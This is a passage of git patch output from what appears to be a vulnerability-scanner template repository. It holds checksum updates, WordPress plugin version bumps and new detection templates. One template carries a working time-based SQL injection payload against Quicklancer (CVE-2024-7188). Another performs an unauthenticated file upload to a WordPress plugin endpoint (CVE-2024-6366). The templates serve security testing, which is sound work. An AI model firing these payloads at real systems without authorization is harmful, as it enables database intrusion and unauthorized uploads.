4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950 From 7cc8762c644a2068128dc14e0626668c35e783f1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 15:31:11 +0000 Subject: [PATCH 1726/1841] Auto Generated Templates Checksum [Mon Jul 29 15:31:11 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a217adc02f..5bd05f1159 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3530,6 +3530,7 @@ http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 +http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -5880,7 +5881,7 @@ http/misconfiguration/ms-exchange-user-enum.yaml:844709108afd1659791b731226dc62a http/misconfiguration/multilaser-pro-setup.yaml:6b10ca82ce94dd55a2b28df9cc37d5d9e5fb2951 http/misconfiguration/mysql-history.yaml:b689b55a94972ee72a19f194d6fd2102d0bc52e0 http/misconfiguration/mysqld-exporter-metrics.yaml:6678116c0c58986fd7999328a503a9f34c7212b4 -http/misconfiguration/nacos/nacos-create-user.yaml:17d971a528a78f5d83ea96b0f814c02c3e306b40 +http/misconfiguration/nacos/nacos-create-user.yaml:762c8b38501b1ee8185e2ce27b6e3efbde4c1ed3 http/misconfiguration/nacos-authentication-bypass.yaml:4900d302c6a62ade0fc27e6c2aebd1c34bffee6a http/misconfiguration/namedprocess-exporter-metrics.yaml:65b4e83040f5a0e2ac2cd0cb8d055384440d62e0 http/misconfiguration/nextcloud-install.yaml:e1781be78fcc3ec76e7718e3031cc01cab4c355a @@ -8775,7 +8776,6 @@ network/cves/2022/CVE-2022-0543.yaml:cc5abf652c0eeb64ce1c6e9ceca8fb13142c812e network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 -network/cves/2024/CVE-2024-6746.yaml:57d0abcd190ae81c0962649f9e99a35d31dbd56f network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 network/default-login/ftp-weak-credentials.yaml:6706b4c1e7c6209ba1e25289fc1286ea4a85484a network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 @@ -8936,7 +8936,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b2dd8d28e74c0972efe9c8af0418772479a4e5c9 +templates-checksum.txt:366f7804fc6a488b179c41bbf91fb41eac849434 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 067e84f4ba5478465e6df427dbb75cd8fdbb3a28 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 29 Jul 2024 21:45:14 +0530 Subject: [PATCH 1727/1841] Create quickcms-installer.yaml --- .../installer/quickcms-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/quickcms-installer.yaml diff --git a/http/misconfiguration/installer/quickcms-installer.yaml b/http/misconfiguration/installer/quickcms-installer.yaml new file mode 100644 index 0000000000..dee1d42dd6 --- /dev/null +++ b/http/misconfiguration/installer/quickcms-installer.yaml @@ -0,0 +1,34 @@ +id: quickcms-installer + +info: + name: QuickCMS Installation Wizard + author: DhiyaneshDK + severity: high + description: | + PMM is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"QuickCMS Installation" + tags: misconfig,exposure,install,quickcms + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "QuickCMS Installation" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 3fecd686bdcbb5fef393c8fc757d75d11a7b4fae Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 29 Jul 2024 19:28:42 +0300 Subject: [PATCH 1728/1841] add cve-2024-7188 --- http/cves/2024/CVE-2024-7188.yaml | 45 +++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-7188.yaml diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml new file mode 100644 index 0000000000..6cfbbddd7d --- /dev/null +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-7188 + +info: + name: Bylancer Quicklancer 2.4 G - SQL Injection + author: securityforeveryone + severity: high + description: | + A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database. + reference: + - https://cvefeed.io/vuln/detail/CVE-2024-7188 + - https://vuldb.com/?id.272609 + - https://github.com/bigb0x/CVEs/blob/main/quicklancer-2-4.md + - https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 + - https://vuldb.com/?ctiid.272609 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-7188 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.16096 + metadata: + verified: true + max-request: 1 + vendor: bylancer + product: quicklancer + shodan-query: http.favicon.hash:1099370896 + fofa-query: icon_hash="1099370896" + tags: cve,cve2024,sqli,quicklancer + +http: + - raw: + - | + @timeout 30s + GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(body,"og:site_name","og:locale","range2")' + - 'contains(content_type,"text/html")' + - 'status_code == 200' + condition: and From 7d4e16eb7e68674d8e9cab87b39e3de67fad7a14 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 29 Jul 2024 20:07:32 +0300 Subject: [PATCH 1729/1841] add CVE-2024-6366 --- http/cves/2024/CVE-2024-6366.yaml | 89 +++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6366.yaml diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml new file mode 100644 index 0000000000..43abcd8940 --- /dev/null +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -0,0 +1,89 @@ +id: CVE-2024-6366 + +info: + name: User Profile Builder < 3.11.8 - Unauthenticated Media Upload + author: securityforeveryone + severity: high + description: | + The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6366 + - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/ + - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366 + classification: + epss-score: 0.00043 + epss-percentile: 0.09351 + metadata: + vendor: cozmoslabs + product: user-profile-builder + framework: wordpress + publicwww-query: "/wp-content/plugins/profile-builder" + tags: cve,cve2024,wpscan,file-upload + +flow: http(1) && http(2) + +variables: + filename: "{{to_lower(rand_text_alpha(12))}}" + +http: + - raw: + - | + GET /wp-content/plugins/profile-builder/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"User Profile Builder")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-admin/async-upload.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW + + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="wppb_upload" + + true + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="meta_name" + + {{filename}}.gif + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="_wpnonce" + + e8 + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="action" + + upload-attachment + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif" + Content-Type: image/jpeg + + GIF89a + + ------WebKitFormBoundary7MA4YWxkTrZu0gW-- + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":true' + - '"id"' + - '"uploadedTo"' + condition: and + + - type: word + part: header + words: + - 'Content-Type: text/plain' + + - type: status + status: + - 200 From d508b1f46d9b1c9accce0162974e4c70fdd97182 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 00:20:16 +0000 Subject: [PATCH 1730/1841] Auto WordPress Plugins Update [Tue Jul 30 00:20:16 UTC 2024] :robot: --- helpers/wordpress/plugins/chaty.txt | 2 +- helpers/wordpress/plugins/duplicate-page.txt | 2 +- helpers/wordpress/plugins/google-analytics-for-wordpress.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/image-optimization.txt | 2 +- helpers/wordpress/plugins/litespeed-cache.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/polylang.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/wordfence.txt | 2 +- helpers/wordpress/plugins/wp-file-manager.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 212 files changed, 13 insertions(+), 213 deletions(-) diff --git a/helpers/wordpress/plugins/chaty.txt b/helpers/wordpress/plugins/chaty.txt index c4a602db6e..6a3913b049 100644 --- a/helpers/wordpress/plugins/chaty.txt +++ b/helpers/wordpress/plugins/chaty.txt @@ -1 +1 @@ -3.2.6 \ No newline at end of file +3.2.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicate-page.txt b/helpers/wordpress/plugins/duplicate-page.txt index ae6e65bd96..d01c9f6604 100644 --- a/helpers/wordpress/plugins/duplicate-page.txt +++ b/helpers/wordpress/plugins/duplicate-page.txt @@ -1 +1 @@ -4.5.3 \ No newline at end of file +4.5.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index 6eae100a2d..c9277c5a60 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.28.0 \ No newline at end of file +9.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 21f81fe803..12f5b64c8f 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.131.0 \ No newline at end of file +1.132.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt index 13175fdc43..8e03717dca 100644 --- a/helpers/wordpress/plugins/image-optimization.txt +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -1 +1 @@ -1.4.1 \ No newline at end of file +1.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 1f2be2a26c..78b71e3f0a 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -6.3 \ No newline at end of file +6.3.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 5553d8c45a..b352098c1e 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.8.8 \ No newline at end of file +3.8.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index 1ac53bb4bd..c3f6bdc3de 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.6.3 \ No newline at end of file +3.6.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index daf8e4cb8c..dd9a10b692 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -8.1.5 \ No newline at end of file +8.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index eae1915347..acc6435b67 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.11.6 \ No newline at end of file +7.11.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-file-manager.txt b/helpers/wordpress/plugins/wp-file-manager.txt index 34f24a4341..b2eea886ec 100644 --- a/helpers/wordpress/plugins/wp-file-manager.txt +++ b/helpers/wordpress/plugins/wp-file-manager.txt @@ -1 +1 @@ -7.2.9 \ No newline at end of file +7.2.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index b293f64d6c..5210382a7a 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -8.0 \ No newline at end of file +8.0.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index dcf8de9db7..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b318d87743d470cc4f3c71d24c6b50bbebad951b7d6048cc3435ce23f2260f9f022006cf2bbb983140d2091a8dfdb2a3cb106d5648356286167e41a4c58f1b4323a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index edcb77542e..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d87854079cd216681cc4a17ab70f426f54672c10d4b093330dc9ee15e55605a022100d15df8f6ebd5b25e24bc44d565ba45769759921611fbff9e15582b5ec7c156ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index a31dd63073..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220486a4048c4c3825401235be49b12fd75fd10a8ef53fb2f3e9464360c5f1f7027022100a6cd9a8c3abee0c72113d33d0e508d1570997bb963429e1db94de86c7c41a39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 5386e56c14..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ 